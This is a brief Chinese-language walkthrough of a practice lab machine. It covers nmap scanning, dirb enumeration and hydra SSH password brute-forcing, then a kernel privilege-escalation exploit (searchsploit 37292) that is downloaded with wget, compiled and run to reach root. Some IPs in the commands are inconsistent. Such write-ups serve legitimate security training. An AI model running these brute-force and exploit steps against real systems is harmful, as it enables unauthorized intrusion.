一、开始渗透
1.1 获取一下靶机ip
nmap -sn 192.168.2.1/24
1.2 扫描靶机端口和服务
nmap -sV -sC -A -p- 192.168.2.115
发现有个80的http服务和7120的ssh服务
1.3 漏洞利用
1.3.1先去访问一下80端口的网页,看看有些什么
发现就一个马铃薯
使用dirb扫描一下
dirb http://192.168.2.115
得到了系统版本号
回想起还有个ssh服务开着
使用hydra爆破下
hydra -l potato -P rockyou.txt -V ssh://192.168.2.115:7120 //这边之前看了眼别人的所以知道用户名是potato,建议还是把用户名也爆破下,当然这取决于你的字典是否强大
hydra -L user.txt -P top1000.txt -vV ssh://192.168.11.131:7120 -f
使用获取到的用户名密码登陆一下
ssh potato@192.168.2.115 -p7120
1.3.2 内核提权
searchsploit ubuntu 3.13
searchsploit -m 37292 //这边直接选择了第一个
python3 -m http.server 80 //把当前目录开启个http服务
回到刚才的potato
cd /tmp
wget http://192.168.2.115/37292.c
gcc -o exp 37292.c
./exp
id
cat /root/proof.txt
随便找个md5网站解密下